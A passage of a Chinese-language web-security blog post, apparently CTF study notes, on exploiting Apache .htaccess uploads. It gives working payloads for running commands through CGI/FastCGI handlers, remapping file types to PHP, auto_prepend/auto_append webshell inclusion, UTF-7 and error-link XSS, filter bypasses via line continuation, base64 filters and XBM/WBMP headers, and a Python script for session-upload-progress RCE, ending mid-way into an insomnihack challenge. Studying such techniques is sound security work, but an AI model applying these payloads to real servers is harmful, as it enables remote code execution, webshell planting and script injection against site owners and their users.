<div class="hljs code-wrapper"><pre><code class="hljs d"><span class="hljs-meta">#!C:/Windows/System32/cmd.exe /c start calc.exe</span></code></pre></div>



<p>linux，</p>
<div class="hljs code-wrapper"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/bash</span>
<span class="hljs-built_in">echo</span> Content-type: text/html
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;&quot;</span>
cat /flag</code></pre></div>

<p>这里需要注意脚本的格式，不知道为什么，这里去掉echo “”就无法执行成功，可能与cgi脚本的格式有关系。</p>
<p>linux环境下，也是随你玩，是直接调用**/bin/bash<strong>还是调用</strong>/usr/bin/python**来反弹Shell。都是可以的。这其实也就是正常使用方式，因为Python也会被用作为CGI解析程序。</p>
<h3 id="FastCGI启动方式RCE利用"><a href="#FastCGI启动方式RCE利用" class="headerlink" title="FastCGI启动方式RCE利用"></a>FastCGI启动方式RCE利用</h3><p>​    我们再来看看FastCGI模式的，这个依赖的是mod_fcgid.so，默认安装包里甚至没有这个so文件，不过在PHPStudy的默认配置中，就已经是加载了的，并且AllowOverride也是All权限，手动斜眼。</p>
<p>​    其实还有mod_proxy_fcgi，更为常见，也是默认开启的，还不清楚能否利用，表哥表姐们可以尝试一下。</p>
<h4 id="利用条件-1"><a href="#利用条件-1" class="headerlink" title="利用条件"></a>利用条件</h4><blockquote>
<p>1.AllowOverride all或AllowOverride Options FileInfo。</p>
<p>2.mod_fcgid.so被加载。即apache配置文件中有LoadModule fcgid_module modules/mod_fcgid.so</p>
<p>3.有目录的上传、写入权限。</p>
</blockquote>
<h4 id="利用姿势-1"><a href="#利用姿势-1" class="headerlink" title="利用姿势"></a>利用姿势</h4><p>上传.htaccess  文件, 内容如下：</p>
<div class="hljs code-wrapper"><pre><code class="hljs dos">Options +ExecCGI
AddHandler fcgid-script .abc
FcgidWrapper &quot;C:/Windows/System32/<span class="hljs-built_in">cmd</span>.exe /c <span class="hljs-built_in">start</span> <span class="hljs-built_in">cmd</span>.exe&quot; .abc</code></pre></div>

<p>老样子，如果默认就开启了ExecCGI，则第一句可以省略。</p>
<p>第二句表示，abc后缀名的文件需要被fcgi来解析。AddHandler还可以换成AddType。</p>
<p>再上传1.abc。内容无所谓。</p>
<h3 id="proxy-fcgi启动方式RCE利用"><a href="#proxy-fcgi启动方式RCE利用" class="headerlink" title="proxy_fcgi启动方式RCE利用"></a>proxy_fcgi启动方式RCE利用</h3><h3 id="使用相对路径"><a href="#使用相对路径" class="headerlink" title="使用相对路径"></a>使用相对路径</h3><p>其实一些小伙伴也已经发现了，上面的问题再配合有上传漏洞，我甚至可以穿个马上去。但是无论是CGI还是FastCGI似乎都是绝对路径，相对路径可不可以呢？</p>
<p>经过了一些尝试，并请教了”裤衩哥”,发现相对路径也是可以的，起始点似乎和session.save_path变量的值是一致的。如图，比如phpstudy当中，起始点就是在\Extensions\tmp\tmp中。</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/1572427454_5db956be0a967.png!small" alt="image.png"></p>
<h4 id="1-解析成php"><a href="#1-解析成php" class="headerlink" title="1. 解析成php"></a>1. 解析成php</h4><p>那么，比如说我想要html后缀使用php来解析。就可以这样写。</p>
<div class="hljs code-wrapper"><pre><code class="hljs jboss-cli">AddHandler fcgid-script <span class="hljs-string">.html</span>
FcgidWrapper <span class="hljs-string">&quot;../../php/php7.3.4nts/php-cgi.exe&quot;</span> <span class="hljs-string">.html</span></code></pre></div>





<p>再来，我想调用网站根目录的calc.exe。可以这样。</p>
<div class="hljs code-wrapper"><pre><code class="hljs jboss-cli">AddHandler fcgid-script <span class="hljs-string">.xx</span>
FcgidWrapper <span class="hljs-string">&quot;../../../WWW/localhost/calc.exe&quot;</span> <span class="hljs-string">.xx</span></code></pre></div>



<p>不过计算器无法正常弹出。23333 我猜应该是因为calc毕竟不是个标准CGI程序导致的吧。而且也没必要绕这么大个圈子，就没继续测试了。</p>
<h3 id="AddType-文件类型解析利用"><a href="#AddType-文件类型解析利用" class="headerlink" title="AddType 文件类型解析利用"></a>AddType 文件类型解析利用</h3><h4 id="1-解析成php-1"><a href="#1-解析成php-1" class="headerlink" title="1. 解析成php"></a>1. 解析成php</h4><div class="hljs code-wrapper"><pre><code class="hljs applescript">AddType <span class="hljs-built_in">application</span>/x-httpd-php .a</code></pre></div>

<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200911085755821.png" alt="image-20200911085755821"></p>
<h4 id="2-php-value-配置选项利用"><a href="#2-php-value-配置选项利用" class="headerlink" title="2. php_value 配置选项利用"></a>2. php_value 配置选项利用</h4><p>这种方式可通过<code>php_value</code>来配置PHP的配置选项；</p>
<p>查看<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/configuration.changes.modes.php">配置可被设定的范围</a>：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t0142ecdfc9bc4dea2c.png" alt="img"></p>
<p>从上图可知，.htaccess可以使两种配置模式生效：<code>PHP_INI_PREDIR</code>和<code>PHP_INI_ALL</code></p>
<p>可查看<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/ini.list.php">php.ini配置选项列表</a>，从中寻找可利用的配置项</p>
<h5 id="2-1-使用文件包含的两个相关配置"><a href="#2-1-使用文件包含的两个相关配置" class="headerlink" title="2.1 使用文件包含的两个相关配置"></a>2.1 使用文件包含的两个相关配置</h5><ul>
<li><code>auto_prepend_file</code>：指定一个文件，在主文件解析之前自动解析</li>
<li><code>auto_append_file</code>：指定一个文件，在主文件解析后自动解析</li>
</ul>
<p>编辑.htaccess，内容为：</p>
<div class="hljs code-wrapper"><pre><code class="hljs angelscript">php_value <span class="hljs-built_in">auto</span>_prepend_file webshell</code></pre></div>

<p>编辑<code>webshell</code>，内容为：</p>
<div class="hljs code-wrapper"><pre><code class="hljs ruby">&lt;<span class="hljs-string">?=</span>phpinfo();</code></pre></div>

<p>此时随便找一个php文件访问：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01bd4392c622f18276.png" alt="img"></p>
<p><strong>然后就是各种文件包含的操作</strong></p>
<p>由于通过设置这两个选项进行文件包含，那么便可使用相关的php协议流，如<code>php://filter</code>，可用来绕过对一些关键字的检测</p>
<h5 id="2-2-绕过preg-match利用"><a href="#2-2-绕过preg-match利用" class="headerlink" title="2.2 绕过preg_match利用"></a>2.2 绕过preg_match利用</h5><p>查看官方文档中的相关配置：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01e72385d9b9ab2b2d.png" alt="img"></p>
<p>编辑.htaccess：</p>
<div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute">php_value</span> pcre.backtrack_limit <span class="hljs-number">0</span>
<span class="hljs-attribute">php_value</span> pcre.jit <span class="hljs-number">0</span></code></pre></div>

<p>测试：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01c94eb522a6e0f5ca.png" alt="img"></p>
<h3 id="使-htaccess文件可访问"><a href="#使-htaccess文件可访问" class="headerlink" title="使.htaccess文件可访问"></a>使.htaccess文件可访问</h3><p>默认情况下，.htaccess是不可访问的：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01cac6209710b84ed5.png"></p>
<p>那么编辑.htaccess文件，添加如下配置：</p>
<div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-section">&lt;Files ~ <span class="hljs-string">&quot;^.ht&quot;</span>&gt;</span>
    <span class="hljs-attribute">Require</span> <span class="hljs-literal">all</span> granted
    <span class="hljs-attribute"><span class="hljs-nomarkup">Order</span></span> <span class="hljs-literal">allow</span>,<span class="hljs-literal">deny</span>
    <span class="hljs-attribute"><span class="hljs-nomarkup">Allow</span></span> from <span class="hljs-literal">all</span>
<span class="hljs-section">&lt;/Files&gt;</span></code></pre></div>

<p>测试：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01a24ca8a58e2fa4ec.png" alt="img"></p>
<h3 id="htaccess-shell-与-XSS"><a href="#htaccess-shell-与-XSS" class="headerlink" title=".htaccess shell 与 XSS"></a>.htaccess shell 与 XSS</h3><p>例如下面这个.htaccess文件，首先设置了禁用拒绝规则，这样便可直接访问到.htaccess；接着用<code>SetHandler</code>将所有文件作为php解析，最后写入php代码，开头用<code>#</code>注释掉，这样便可成功解析.htaccess，然后解析php：</p>
<div class="hljs code-wrapper"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">Files</span> ~ &quot;^<span class="hljs-attr">.ht</span>&quot;&gt;</span>
 Require all granted
 Order allow,deny
 Allow from all
<span class="hljs-tag">&lt;/<span class="hljs-name">Files</span>&gt;</span>
SetHandler application/x-httpd-php
# &lt;?php phpinfo(); ?&gt;</code></pre></div>



<p>相关的关于.htaccess的shell，可参考github上一个项目：里面有各种语言的shell。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/wireghoul/htshells">https://github.com/wireghoul/htshells</a></p>
<h4 id="php-code-execution"><a href="#php-code-execution" class="headerlink" title="php code execution"></a>php code execution</h4><p>index.php: (empty)</p>
<p>.htaccess:</p>
<div class="hljs code-wrapper"><pre><code class="hljs php-template"><span class="xml">php_value auto_append_file .htaccess</span>
<span class="xml">#</span><span class="php"><span class="hljs-meta">&lt;?php</span> phpinfo();</span></code></pre></div>



<h4 id="direct-remote-file-inclusion（不可用）"><a href="#direct-remote-file-inclusion（不可用）" class="headerlink" title="(direct/remote) file inclusion（不可用）"></a>(direct/remote) file inclusion（不可用）</h4><p>index.php: (empty)</p>
<p>.htaccess:</p>
<div class="hljs code-wrapper"><pre><code class="hljs lasso">php_flag allow_url_include <span class="hljs-number">1</span>
php_value auto_append_file <span class="hljs-built_in">data</span>:<span class="hljs-comment">//text/plain;base64,PD9waHAgcGhwaW5mbygpOw==</span>
#php_value auto_append_file <span class="hljs-built_in">data</span>:<span class="hljs-comment">//text/plain,%3C%3Fphp+phpinfo%28%29%3B</span>
#php_value auto_append_file https:<span class="hljs-comment">//sektioneins.de/evil-code.txt</span></code></pre></div>



<p>打开allow_url_include 后，可以直接远程文件包含，也可以用data协议getshell</p>
<p><strong>查阅文档后发现allow_url_include不可用htaccess来进行修改</strong></p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200912102329350.png" alt="image-20200912102329350"></p>
<p>此项无效</p>
<h4 id="XSS-and-PHP-code-execution-with-UTF-7"><a href="#XSS-and-PHP-code-execution-with-UTF-7" class="headerlink" title="XSS and PHP code execution with UTF-7"></a>XSS and PHP code execution with UTF-7</h4><p>index.php: (empty)</p>
<p>.htaccess:</p>
<div class="hljs code-wrapper"><pre><code class="hljs mipsasm">php_flag zend.<span class="hljs-keyword">multibyte </span><span class="hljs-number">1</span>
php_value zend.<span class="hljs-keyword">script_encoding </span><span class="hljs-string">&quot;UTF-7&quot;</span>
php_value auto_append_file .htaccess
<span class="hljs-comment">#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+ADs</span></code></pre></div>



<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200912102552476.png" alt="image-20200912102552476"></p>
<p><code>+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4</code></p>
<p>解码后为</p>
<p><code>&lt;script&gt;alert(1);&lt;/script&gt;</code></p>
<h4 id="XSS-via-error-message-link-extension"><a href="#XSS-via-error-message-link-extension" class="headerlink" title="XSS via error message link extension"></a>XSS via error message link extension</h4><p>index.php:</p>
<div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-keyword">include</span>(<span class="hljs-string">&#x27;foo&#x27;</span>);</code></pre></div>

<p>.htaccess:</p>
<div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute">php_flag</span> display_errors <span class="hljs-number">1</span>
<span class="hljs-attribute">php_flag</span> html_errors <span class="hljs-number">1</span>
<span class="hljs-attribute">php_value</span> docref_root <span class="hljs-string">&quot;x&quot;</span>
<span class="hljs-attribute">php_value</span> docref_ext <span class="hljs-string">&quot;&lt;script&gt;alert(1);&lt;/script&gt;&quot;</span></code></pre></div>





<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200912103938003.png" alt="image-20200912103938003"></p>
<h4 id="XSS-via-highlight-file-color"><a href="#XSS-via-highlight-file-color" class="headerlink" title="XSS via highlight_file() color"></a>XSS via highlight_file() color</h4><p>index.phps:</p>
<div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
highlight_file(<span class="hljs-keyword">__FILE__</span>);
<span class="hljs-comment">// comment</span>
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>.htaccess:</p>
<div class="hljs code-wrapper"><pre><code class="hljs xml">php_value highlight.comment &#x27;&quot;&gt;<span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span>alert(1);<span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>&#x27;</code></pre></div>



<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200912103730890.png" alt="image-20200912103730890"></p>
<h4 id="Source-code-disclosure（直接查看源码）"><a href="#Source-code-disclosure（直接查看源码）" class="headerlink" title="Source code disclosure（直接查看源码）"></a>Source code disclosure（直接查看源码）</h4><p>.htaccess:</p>
<div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute">php_flag</span> engine <span class="hljs-number">0</span></code></pre></div>



<h2 id="0x06-Bypass方式"><a href="#0x06-Bypass方式" class="headerlink" title="0x06 Bypass方式"></a>0x06 Bypass方式</h2><h3 id="1-关键字检测"><a href="#1-关键字检测" class="headerlink" title="1.关键字检测"></a>1.关键字检测</h3><h4 id="1-1-过滤了-htaccess常用的关键字"><a href="#1-1-过滤了-htaccess常用的关键字" class="headerlink" title="1.1 过滤了.htaccess常用的关键字"></a>1.1 过滤了.htaccess常用的关键字</h4><p>如果过滤了.htaccess常用的关键字，此时可以使用反斜线来绕过对关键字的过滤，反斜线后需要加上换行符，并且反斜线前和关键字无空格</p>
<p>例如：</p>
<div class="hljs code-wrapper"><pre><code class="hljs applescript">AddT\
ype <span class="hljs-built_in">application</span>/x-httpd-php .abc</code></pre></div>



<h4 id="1-2-过滤了-lt-等php字符串"><a href="#1-2-过滤了-lt-等php字符串" class="headerlink" title="1.2 过滤了&lt;?等php字符串"></a>1.2 过滤了<code>&lt;?</code>等php字符串</h4><p>如果检测不能含有<code>&lt;?</code>等php字符串，那么此时可先将shell字符串进行编码，然后在文件包含时通过<code>php://filter</code>解码：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t0131a681178bf98a67.png" alt="img"></p>
<div class="hljs code-wrapper"><pre><code class="hljs awk">php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/read=convert.base64-decode/</span>resource=<span class="hljs-number">2</span>.abc</code></pre></div>



<p>也可以直接写在htaccess文件中</p>
<div class="hljs code-wrapper"><pre><code class="hljs applescript">AddType <span class="hljs-built_in">application</span>/x-httpd-php .wuwu
php_value auto_append_file <span class="hljs-string">&quot;php://filter/convert.base64-decode/resource=shell.wuwu&quot;</span></code></pre></div>



<h4 id="1-3-直接进行其他编码"><a href="#1-3-直接进行其他编码" class="headerlink" title="1.3 直接进行其他编码"></a>1.3 直接进行其他编码</h4><p>通过UTF-7、UTF-16等进行编码</p>
<p><a target="_blank" rel="noopener" href="https://p1.ssl.qhimg.com/t01c5a05b61a6155478.png"><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t01c5a05b61a6155478.png" alt="img"></a></p>
<p>编辑.htaccess：</p>
<div class="hljs code-wrapper"><pre><code class="hljs stylus">AddType application/x-httpd-php .aaa
php_flag zend<span class="hljs-selector-class">.multibyte</span> <span class="hljs-number">1</span>
php_value zend<span class="hljs-selector-class">.script_encoding</span> <span class="hljs-string">&quot;UTF-7&quot;</span></code></pre></div>

<p>之后将后缀<code>.aaa</code>文件的内容进行相应编码即可</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200911104400025.png" alt="image-20200911104400025"></p>
<p>实际上文件包含会直接进行解码</p>
<p>不使用上述配置一样可行</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200911104751138.png" alt="image-20200911104751138"></p>
<h4 id="1-4-拼接无用字符"><a href="#1-4-拼接无用字符" class="headerlink" title="1.4 拼接无用字符"></a>1.4 拼接无用字符</h4><p>可以使用<code>#</code>来注释掉后面拼接的多余内容，<code>#</code>需要和前面的内容隔一个空格，并且<code>#</code>只能注释一行内容，可以使用反斜线来转义换行符，从而注释多行内容</p>
<p>例如下面这个.htaccess文件是可以生效的：</p>
<div class="hljs code-wrapper"><pre><code class="hljs livescript">AddT<span class="hljs-string">\</span>
ype application/x-httpd-php .abc <span class="hljs-comment">#\</span>
asdf <span class="hljs-string">\</span>
asdf</code></pre></div>





<p>除了<code>#</code>外，**<code>0x00</code>**也可以当注释符，使用<code>write.php</code>脚本写入.htaccess：</p>
<div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-variable">$data</span> = urldecode(<span class="hljs-string">&#x27;AddType application/x-httpd-php .abc%0a%00asdf&#x27;</span>);
file_put_contents(<span class="hljs-string">&#x27;.htaccess&#x27;</span>, <span class="hljs-variable">$data</span>);</code></pre></div>

<p>测试：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/image-20200911105518417.png" alt="image-20200911105518417"></p>
<h3 id="2-文件格式检测（绕过exif-imagetype）"><a href="#2-文件格式检测（绕过exif-imagetype）" class="headerlink" title="2. 文件格式检测（绕过exif_imagetype）"></a>2. 文件格式检测（绕过exif_imagetype）</h3><h4 id="2-1-使用XBM图像"><a href="#2-1-使用XBM图像" class="headerlink" title="2.1 使用XBM图像"></a>2.1 使用XBM图像</h4><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-comment">// 创建空白图像并添加文字</span>
<span class="hljs-variable">$im</span> = imagecreatetruecolor(<span class="hljs-number">120</span>, <span class="hljs-number">20</span>);
<span class="hljs-variable">$text_color</span> = imagecolorallocate(<span class="hljs-variable">$im</span>, <span class="hljs-number">233</span>, <span class="hljs-number">14</span>, <span class="hljs-number">91</span>);
imagestring(<span class="hljs-variable">$im</span>, <span class="hljs-number">1</span>, <span class="hljs-number">5</span>, <span class="hljs-number">5</span>,  <span class="hljs-string">&#x27;A Simple Text String&#x27;</span>, <span class="hljs-variable">$text_color</span>);

<span class="hljs-comment">// 保存图像</span>
imagexbm(<span class="hljs-variable">$im</span>, <span class="hljs-string">&#x27;1.png&#x27;</span>);

<span class="hljs-comment">// 释放内存</span>
imagedestroy(<span class="hljs-variable">$im</span>);
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>(下面的<code>1_png_width</code>以及<code>1_png_height</code>是根据文件名进行拼接生成的)</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t018f3be6bcb8f72d0b.png" alt="img"></p>
<p>那么可以在.htaccess前面加上：</p>
<div class="hljs code-wrapper"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> 1_png_width 120</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> 1_png_height 20</span></code></pre></div>

<p>便可绕过对文件格式的检测</p>
<h4 id="2-2-使用WBMP图像"><a href="#2-2-使用WBMP图像" class="headerlink" title="2.2 使用WBMP图像"></a>2.2 使用WBMP图像</h4><p>使用WBMP图像，使用PHP生成图像：</p>
<div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-variable">$img</span> = imagecreatetruecolor(<span class="hljs-number">20</span>, <span class="hljs-number">20</span>);
imagewbmp(<span class="hljs-variable">$img</span>, <span class="hljs-string">&#x27;1.wbmp&#x27;</span>);
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>使用16进制编辑器查看：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t018eadaee755935c3a.png" alt="img"></p>
<p>可以看到这种图像格式是以<code>0x00</code>开头的，那么便可以此方式绕过对文件格式的检测</p>
<h3 id="3-session-文件包含"><a href="#3-session-文件包含" class="headerlink" title="3. session 文件包含"></a>3. session 文件包含</h3><p>若过滤了<code>&lt;</code>、数字、<code>:</code>等，此时便不能使用<code>php://filter</code>或者UTF编码的方式绕过了；可尝试利用.htaccess设置包含指定的文件。例如对于session文件，可通过包含上传文件产生的临时session进行RCE</p>
<p>查看配置文件，发现大部分session相关的配置都是可以通过.htaccess修改的：</p>
<p><img src="http://de34dnotespics.oss-cn-beijing.aliyuncs.com/img/t0122f5df0960075c53.png" alt="img"></p>
<p>那么我们可以在不知道session存储路径的情况下，通过<code>session.save_path</code>指定存储路径，并且可以将<code>session.upload_progress.cleanup</code>设置为off，这样便可无需条件竞争来将代码写到session文件中，从而包含rce；编辑.htaccess：</p>
<div class="hljs code-wrapper"><pre><code class="hljs pgsql">php_value auto_append_file &quot;/tmp/sess_gtfly&quot;
php_value <span class="hljs-keyword">session</span>.save_path &quot;/tmp&quot;
php_flag <span class="hljs-keyword">session</span>.upload_progress.cleanup <span class="hljs-keyword">off</span></code></pre></div>

<p>由于关掉了cleanup，所以不用竞争了</p>
<p>payload</p>
<div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests

url=<span class="hljs-string">&#x27;http://127.0.0.1/test.php&#x27;</span>

headers=&#123;
    <span class="hljs-string">&quot;Cookie&quot;</span>:<span class="hljs-string">&#x27;PHPSESSID=gtfly&#x27;</span>
&#125;

files=&#123;
    <span class="hljs-string">&quot;upload&quot;</span>:<span class="hljs-string">&#x27;&#x27;</span>
&#125;

data=&#123;
    <span class="hljs-string">&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</span>: <span class="hljs-string">&#x27;&#x27;&#x27;&lt;?php echo system(&#x27;whoami&#x27;); ?&gt;&#x27;&#x27;&#x27;</span>
     &#125;

r = requests.session()

r.post(url,files=files,headers=headers,data=data)

t = r.get(<span class="hljs-string">&#x27;http://127.0.0.1/test.php&#x27;</span>,headers=headers)

print(t.text)</code></pre></div>





<h2 id="0x06-相关例题"><a href="#0x06-相关例题" class="headerlink" title="0x06 相关例题"></a>0x06 相关例题</h2><h3 id="insomnihack——l33t-hoster"><a href="#insomnihack——l33t-hoster" class="headerlink" title="insomnihack——l33t_hoster"></a><a target="_blank" rel="noopener" href="https://github.com/eboda/insomnihack">insomnihack</a>——l33t_hoster</h3><div class="hljs code-wrapper"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span>
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;source&quot;</span>])) 
    <span class="hljs-keyword">die</span>(highlight_file(<span class="hljs-keyword">__FILE__</span>));

session_start();

<span class="hljs-keyword">if</span> (!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&quot;home&quot;</span>])) &#123;
    <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&quot;home&quot;</span>] = bin2hex(random_bytes(<span class="hljs-number">20</span>));
&#125;
<span class="hljs-variable">$userdir</span> = <span class="hljs-string">&quot;images/<span class="hljs-subst">&#123;$_SESSION[&quot;home&quot;]&#125;</span>/&quot;</span>;
<span class="hljs-keyword">if</span> (!file_exists(<span class="hljs-variable">$userdir</span>)) &#123;
    mkdir(<span class="hljs-variable">$userdir</span>);
&#125;

<span class="hljs-variable">$disallowed_ext</span> = <span class="hljs-keyword">array</span>(
    <span class="hljs-string">&quot;php&quot;</span>,
    <span class="hljs-string">&quot;php3&quot;</span>,
    <span class="hljs-string">&quot;php4&quot;</span>,
    <span class="hljs-string">&quot;php5&quot;</span>,
    <span class="hljs-string">&quot;php7&quot;</span>,
    <span class="hljs-string">&quot;pht&quot;</span>,
    <span class="hljs-string">&quot;phtm&quot;</span>,
    <span class="hljs-string">&quot;phtml&quot;</span>,
    <span class="hljs-string">&quot;phar&quot;</span>,
    <span class="hljs-string">&quot;phps&quot;</span>,
);


<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;upload&quot;</span>])) &#123;
    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;image&#x27;</span>][<span class="hljs-string">&#x27;error&#x27;</span>] !== UPLOAD_ERR_OK) &#123;
        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;yuuuge fail&quot;</span>);
    &#125;

    <span class="hljs-variable">$tmp_name</span> = <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&quot;image&quot;</span>][<span class="hljs-string">&quot;tmp_name&quot;</span>];
    <span class="hljs-variable">$name</span> = <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&quot;image&quot;</span>][<span class="hljs-string">&quot;name&quot;</span>];
    <span class="hljs-variable">$parts</span> = explode(<span class="hljs-string">&quot;.&quot;</span>, <span class="hljs-variable">$name</span>);
    <span class="hljs-variable">$ext</span> = array_pop(<span class="hljs-variable">$parts</span>);

    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$parts</span>[<span class="hljs-number">0</span>])) &#123;
        array_shift(<span class="hljs-variable">$parts</span>);
    &#125;

    <span class="hljs-keyword">if</span> (count(<span class="hljs-variable">$parts</span>) === <span class="hljs-number">0</span>) &#123;
        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;lol filename is empty&quot;</span>);
    &#125;

    <span class="hljs-keyword">if</span> (in_array(<span class="hljs-variable">$ext</span>, <span class="hljs-variable">$disallowed_ext</span>, <span class="hljs-literal">TRUE</span>)) &#123;
        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;lol nice try, but im not stupid dude...&quot;</span>);
    &#125;

    <span class="hljs-variable">$image</span> = file_get_contents(<span class="hljs-variable">$tmp_name</span>);
    <span class="hljs-keyword">if</span> (mb_strpos(<span class="hljs-variable">$image</span>, <span class="hljs-string">&quot;&lt;?&quot;</span>) !== <span class="hljs-literal">FALSE</span>) &#123;
        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;why would you need php in a pic.....&quot;</span>);
    &#125;

    <span class="hljs-keyword">if</span> (!exif_imagetype(<span class="hljs-variable">$tmp_name</span>)) &#123;
        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;not an image.&quot;</span>);
    &#125;

    <span class="hljs-variable">$image_size</span> = getimagesize(<span class="hljs-variable">$tmp_name</span>);
    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$image_size</span>[<span class="hljs-number">0</span>] !== <span class="hljs-number">1337</span> || <span class="hljs-variable">$image_size</span>[<span class="hljs-number">1</span>] !== <span class="hljs-number">1337</span>) &#123;
        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;lol noob, your pic is not l33t enough&quot;</span>);
    &#125;

    <span class="hljs-variable">$name</span> = implode(<span class="hljs-string">&quot;.&quot;</span>, <span class="hljs-variable">$parts</span>);
    move_uploaded_file(<span class="hljs-variable">$tmp_name</span>, <span class="hljs-variable">$userdir</span> . <span class="hljs-variable">$name</span> . <span class="hljs-string">&quot;.&quot;</span> . <span class="hljs-variable">$ext</span>);
&#125;

<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h3&gt;Your &lt;a href=<span class="hljs-subst">$userdir</span>&gt;files&lt;/a&gt;:&lt;/h3&gt;&lt;ul&gt;&quot;</span>;
<span class="hljs-keyword">foreach</span>(glob(<span class="hljs-variable">$userdir</span> . <span class="hljs-string">&quot;*&quot;</span>) <span class="hljs-keyword">as</span> <span class="hljs-variable">$file</span>) &#123;
    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;li&gt;&lt;a href=&#x27;<span class="hljs-subst">$file</span>&#x27;&gt;<span class="hljs-subst">$file</span>&lt;/a&gt;&lt;/li&gt;&quot;</span>;
&#125;
<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;/ul&gt;&quot;</span>;

<span class="hljs-meta">?&gt;</span>

&lt;h1&gt;Upload your pics!&lt;/h1&gt;
&lt;form method=<span class="hljs-string">&quot;POST&quot;</span> action=<span class="hljs-string">&quot;?&quot;</span> enctype=<span class="hljs-string">&quot;multipart/form-data&quot;</span>&gt;
    &lt;input type=<span class="hljs-string">&quot;file&quot;</span> name=<span class="hljs-string">&quot;image&quot;</span>&gt;
    &lt;input type=<span class="hljs-string">&quot;submit&quot;</span> name=upload&gt;
&lt;/form&gt;
&lt;!-- /?source --&gt;
<span class="hljs-number">1</span></code></pre></div>

<ul>
<li><p>文件名必须要包含<code>.</code></p>
</li>
<li><p>设置了文件后缀黑名单<code>&quot;php&quot;,&quot;php3&quot;,&quot;php4&quot;,&quot;php5&quot;,&quot;php7&quot;,&quot;pht&quot;,&quot;phtm&quot;,&quot;phtml&quot;,&quot;phar&quot;,&quot;phps&quot;</code>,黑名单非常完善。</p>
<ul>
<li>如果文件名是通过get或post获取的，可采用<code>php\n</code>的方式绕过</li>
<li>如果存在<code>.htaccess</code>可以通过上传<code>.htaccess</code>达到其他后缀的效果</li>
<li>如果获取文件后缀的方式有问题，可以通过<code>php/.</code> 方式绕过</li>
</ul>
</li>
<li><p>文件内容不能包含<code>&lt;?</code></p>
<ul>
<li><p>通过php小于7.0的可以通过<code>&lt;script lanague=&#39;php&#39;&gt;</code> 绕过</p>
</li>
